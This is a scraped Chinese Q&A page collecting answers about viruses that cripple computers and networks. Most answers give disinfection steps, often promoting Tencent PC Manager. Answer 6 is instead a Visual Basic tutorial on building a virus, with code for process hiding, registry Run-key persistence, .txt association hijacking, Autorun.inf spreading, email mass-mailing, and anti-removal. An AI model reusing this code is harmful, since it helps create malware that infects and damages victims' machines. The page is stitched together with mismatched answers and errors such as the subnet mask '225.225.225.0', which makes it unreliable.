因病毒引起電腦癱瘓要斷開網路嘛

1. 如何應對計算機病毒攻擊所造成的網路癱瘓等問題

趕緊殺毒，就按我下面的操作來

第一，請您先不要著急，只要病毒就有克制的方法。

第二，建議您現在立刻下載騰訊電腦管家「8.0」最新版，對電腦首先進行一個體檢，打開所有防火牆避免系統其餘文件被感染。

第三，打開殺毒頁面開始查殺，切記要打開小紅傘引擎。

第四，如果普通查殺不能解決問題，您可以打開騰訊電腦管家---工具箱---頑固木馬專殺- 進行深度掃描。

第五，查殺處理完所有病毒後，立刻重啟電腦，再進行一次安全體檢，清除多餘系統緩存文件，避免二次感染。

2. 電腦中病毒了，機子癱瘓了，怎麼辦

您好

1，建議您換個殺毒軟體試試吧，到電腦管家官網下載一個騰訊電腦管家。

2，然後重啟電腦按F8進入帶網路的安全模式，因為安全模式下可以徹底查殺復制型病毒母體。

3，進入安全模式後，打開騰訊電腦管家進行全盤查殺即可。

4，查殺完後，最好再用電腦管家的安全體檢功能，對電腦做一個全面體檢，修復被病毒篡改的系統默認項。

如果還有其他疑問和問題，歡迎再次來電腦管家企業平台進行提問，我們將盡全力為您解答疑難

3. 公司因為個別員工主機中毒，而導致整個網路癱瘓的情況，遇到這個問題怎麼解決啊怎麼避免啊

首先你是由於個別員工主機中毒了導致整個網路癱瘓，這個情況一般都是中毒計算機發大量的數據包阻塞網路環境（如ARP或者其他數據包），這樣就需要確定到底是哪個或者哪些主機在發包導致網路癱瘓，確定這些主機發的包的類型，然後在你的防火牆或者交換機上配置相應的策略（如首先把找到的幾台計算機斷網，然後查殺病毒，最後在防火牆或者交換機上設置相應的包過濾策略等等）。
具體解決辦法：可以用一些抓包的軟體進行數據流量分析，在你的伺服器上或者交換機（能夠支持鏡像數據），抓取整個網路中的數據包，通過抓取一段時間進行數據會話分析，把中毒計算機的IP/MAC分析出來再進行相應處理即可，這個國內外也比較多了，但是個人用了一些國外和國內的，國外的是英文版的，操作不是很方便，國內的話，試試科來的網路分析系統，裡面的專家診斷功能可以把網路的各個層次的問題都自動診斷出來，包括攻擊、性能等方面，比較好用的一款工具。

4. 電腦估計中了什麼病毒了，現在每秒64Kb的數據包不停ping網關導致網關幾乎癱瘓。

您好：

這樣的情況可能是您的電腦中了終結者木馬病毒導致的網關幾乎癱瘓，建議您使用騰訊電腦管家對您的電腦進行一下全面的殺毒吧，打開騰訊電腦管家中的殺毒功能選擇閃電查殺或者全盤查殺就可以的哦，騰訊電腦管家是採用「4+1」核「芯」殺毒引擎的專業殺毒軟體，是完全可以幫助您查殺病毒而且保護您的電腦的哦。

您可以點擊這里下載最新版的騰訊電腦管家：最新版騰訊電腦管家下載

騰訊電腦管家企業平台：http://..com/c/guanjia/

5. 電腦中病毒癱瘓了啊，高手幫忙啊！

建議你使用同事的電腦或者其他比較安全的電腦去下載機器狗的專殺，解壓好了以後，使用U盤在自己的電腦下殺毒。
專殺工具不要拷貝在自己的電腦上，就在U盤里運行，在這之前，請一定關閉U盤的自己播放，不要雙擊U盤，選擇在資源管理器中打開U盤，並運行U盤里的專殺。
在整個過程中， 請一定斷開你的網路連接，在使用機器狗專殺殺死機器狗以後，你就可是使用你電腦上的殺毒軟體了（機器狗主要破話是還原工具，但它也會破壞你的殺毒軟體，所以之前殺你的殺毒軟體沒有效果）。
在殺死機器狗以後（建議你順帶把AV終結者的專殺一起下了，應為這兩個病毒，都有破壞電腦安全軟體的作用）。當你殺死他們後，你的安全軟體，就能發揮它的作用殺死其他的小木馬了， 在確認殺讀完全之前，請不要連接到任何網路上。
以後操作建議在安全模式下，運行。。。另外如果你不能進入安全模式，哪么請考慮下載磁碟機的專殺工具。
也就是說，你的殺毒順序，最好是磁碟機（如果不能進安全模式的話， 考慮有此病毒），然後機器狗和AV終結者-最後是普通病毒。

6. 電腦中毒，網路癱瘓

對於接觸計算機的朋友們來說，病毒已經不在是一個陌生的東西。病毒一般都具有傳播、隱藏、破
壞等能力。所以自從第一個病毒問世以來，它便被人們視為一種神秘的東西。但是，我們要知道。
病毒也是程序，也是由人寫出來的。所以，病毒並不是什麼高不可攀的東西。現在，讓我們了解一
下VB製作病毒的原理。
首先，病毒是有隱藏性的。如何來實現病毒的隱藏是很多年來的熱點話題。我們先不接觸什麼線程
插入技術。我們要實行自我隱藏，就要用到API函數。其代碼如下：
Public Declare Function GetCurrentProcessid Lib "kernel32" （) As Long
Public Declare Function RegisterServiceProcess Lib "kernel32" （ByVal dwProcessID As
Long, ByVal dwType As Long)
Public Const RSP_SIMPLE_SERVICE = 1
Public Const RSP_UNREGISTER_SERVICE = 0
Public Sub MakeMeService（)
Dim pid As Long
Dim resery As Long
pid = GetCurrentProcessid（)
regserv = RegisterServiceProcess（pid, RSP_SIMPLE_SERVICE)
End Sub
這樣就實現了自我隱藏。還有別的什麼App.Title = ""和App.TaskVisible = False都可以用於VB病
毒的隱藏。
病毒光會隱藏還不行，還要有常駐內存的能力。說通俗點，計算機關閉病毒也就跟著死去，而計算
機重啟，病毒也要跟這復活。所以，我們接下來的任務就是：實現病毒的開機自啟。
了解病毒的朋友會知道，病毒一般是利用在注冊表中插入相應鍵值來實現開機自啟的。所以，我們
就要利用編程來實現著一功能。讀寫注冊表要用到API函數，代碼：
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" （ByVal
hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" （ByVal hKey As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA"
（ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType
As Long, lpData As Any, ByVal cbData As Long) As Long
上述是API聲明。病毒的開機自啟就是在RUN下建立一個啟動項，代碼：
Dim hKey As Long
Dim cc
Let cc = Len（"病毒的絕對路徑")
RegCreateKey HKEY_LOCAL_MACHINE,
"Software\Microsoft\Windows\CurrentVersion\Runservices", hKey
RegSetValueEx hKey, "鍵名", 0, REG_SZ, ByVal "病毒的絕對路徑", cc
RegCloseKey hKey
以上代碼執行後會在注冊表中加入一個病毒的啟動項。
光利用開機自啟來長駐內存也太容易被殺了。所以，我們還要想盡一切辦法來讓病毒啟動。這里介
紹的2種辦法。
第一種。修改文本文件的關聯。其代碼如下：
API聲明：
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" （ByVal
hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" （ByVal
hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String,
ByVal cbData As Long) As Long
Const HKEY_CLASSES_ROOT = &H80000000
Const REG_SZ = 1
實現代碼：
Dim sKeyName As String 『存儲鍵名
Dim sKeyValue As String 『存儲鍵值
Dim MyReturn As Long 『存儲返回值信息
Dim keyhandle As Long
sKeyName = "Test"
sKeyValue = "Test Application"
MyReturn& = RegCreateKey&（HKEY_CLASSES_ROOT, sKeyName, keyhandle&)
MyReturn& = RegSetValue&（keyhandle&, "", REG_SZ, sKeyValue, 0&)
MsgBox MyReturn&
sKeyName = ".txt" 『要建立關聯的文件後綴名
sKeyValue = "Test"
MyReturn& = RegCreateKey&（HKEY_CLASSES_ROOT, sKeyName, keyhandle&)
MyReturn& = RegSetValue&（keyhandle&, "", REG_SZ, sKeyValue, 0&)
sKeyName = "Test"
sKeyValue = "D:\\病毒.exe %1" 『自己程序的位置和名稱
MyReturn& = RegCreateKey&（HKEY_CLASSES_ROOT, sKeyName, keyhandle&)
MyReturn& = RegSetValue&（keyhandle&, "shell\open\command", REG_SZ, sKeyValue,
MAX_PATH)
End Sub
以上是利用修改TXT文件關聯來實現病毒啟動的。
第二種，利用Autorun.inf
光碟就是利用這個來自動播放的，所以我就不廢話了。
實現代碼：
If Dir（"F:\") <> "" Then Let a = App.Path + "\" + App.EXEName + ".exe"
FileCopy a, "C:\病毒.exe"
Open "Autorun.inf" For Output As #1
Print #1, "[autorun]"
Print #1, "OPEN=病毒.exe"
Close #1
這樣就實現了雙擊C盤啟動病毒的作用。
下面說一下病毒的傳播，病毒的傳播可以說是八仙過海。主要的傳播方式就是電子郵件傳播，遠程
溢出等。
遠程溢出這里不做詳解。第一是我不太熟練，只會用，不會說。第二是要講清楚很麻煩。所以，我
講一下電子郵件傳播。
首先，建立一個WINSOCKE。然後利用編程來實現。這里只說思路。
ConnectToServer Server, Winsock1 『這是向伺服器建立連接
SendMail FromAddress, ToAddress, Subject, Body, Winsock1, Attach 『發送郵件
FromAddress 發件人地址
ToAddress 收件人地址
Subject 郵件標題
Body 郵件內容
Attach 附件地址
利用這樣的原理來群發，可以達到傳播自己的目的。
還有一種就是U盤/A盤傳播，原理上面已經說過。利用Autorun.inf文件，這里就不廢話了。
說了這么多，還剩最後一點，那就是破壞性。這個就不詳細闡述。什麼自動關機，無限增殖。大家
自己發揮想像，這不是很難的事。
最後總結，一個什麼樣的病毒，它必須生活在特定的操作系統下。所以，病毒做出來後，不一定能
在什麼操作系統下都能用。還有一點，病毒必須能自己保護自己。這里推薦使用TIMER。利用這個部
件來不斷的寫注冊表。這樣，很難刪掉病毒的啟動鍵值。還要保護自身的增殖文件。比如：
Let a = App.Path + "\" + App.EXEName + ".exe"
If Dir（"C:\Program Files\病毒.exe") <> "" Then
Else: FileCopy a, "C:\Program Files\病毒.exe"
最後，還有最重要的一點。那就是容錯語句。盡量多加。以防萬一。

希望可以幫到你

7. 病毒把電腦弄癱瘓了，網斷了，殺毒軟體癱了，把殺毒軟體一刪，網又連上了怎麼回事呢在線等

您好：如果懷疑係統存在病毒，建議您安裝瑞星殺毒軟體V16版本升級到最新病毒庫後進行病毒掃描查殺，下載地址：http://pc.rising.com.cn/

8. 如何處理計算機病毒造成的網路信息系統癱瘓等突發故障

故障處理，大概遵循以下幾個大的方向。

1、收到報警或定期巡檢；

2、檢查是否誤報；

3、確認報警內容屬實進行相應處理；

4、檢查是否有預案，如有則按照預案處理，如無則盡快聯系廠商處理，同時對此事備案。

在處理問題環節，如果在自身團隊無法處理的時候，及時和廠商聯系，獲取更專業的支持。

對於系統運維來說，不僅僅要關注軟體層面的問題以及運維，同時對於基礎IT建設也要有一定的了解，最起碼要知道出現問題應該找誰解決。隨著現階段技術的發展，不可能做到一個人對所有技術面面俱到，那麼在無法解決問題的時候，如何找到解決問題的人，應該是每一個系統運維人員所必須要了解的。

空調故障的問題偶然性很強，但是依然有方法避免，那就是採取硬體服役到一定年限後更換，而不是等它徹底損壞後再更換。但是這種方法會帶來很多額外的費用支出，一般來說，在企業中推行這種方法需要IT部門有一個強有力的後盾去支持才能較好的達到預期效果。

還有一點是值得注意的，不管具體是什麼故障，做好預案和備案最重要，以防止這種問題再次發生，或者再次發生後，也可以極為快速地去解決問題。

9. 什麼病毒會導致網路連接中斷

您好

1，有很多病毒會篡改通信協議，都會導致斷網，有些ARP欺騙攻擊也會導致斷網。

2，如果您的電腦經常斷網，還可能是存在IP沖突等等。

3，您可以先到騰訊電腦管家官網下載一個電腦管家。

4，打開電腦管家——殺毒——全盤查殺，根據電腦管家提示對病毒做出清理即可。

6，打開網上鄰居——查看網路連接——TCPIP協議，將您的IP地址修改為固定IP，這樣可能以後您電腦就不會斷網了，如果還斷的話，可能是線路或者運營商的問題。

P地址：192.168.1.（2-255任意）

子網掩碼：225.225.225.0

默認網關：192.168.0.1或者是192.168.1.1

如果還有其他疑問和問題，歡迎再次來電腦管家企業平台進行提問，我們將盡全力為您解答疑難

10. 幾百台電腦中有一台中毒引起網路癱瘓的處理。

您好：

一台中毒的話是有沒有可能引起整個網路癱瘓的，畢竟現在可以依靠區域網傳播的木馬病的已經很多了，建議您使用騰訊電腦管家保護您區域網中的電腦的安全吧，騰訊電腦管家是採用「 4+1 」核「芯」殺毒引擎的專業殺毒軟體，殺毒防毒能力強，騰訊電腦管家還有清理垃圾、電腦加速、修復漏洞、軟體管理、電腦診所等電腦管理功能，您可以點擊這里下載最新版的騰訊電腦管家：最新版騰訊電腦管家下載

騰訊電腦管家企業平台：http://..com/c/guanjia/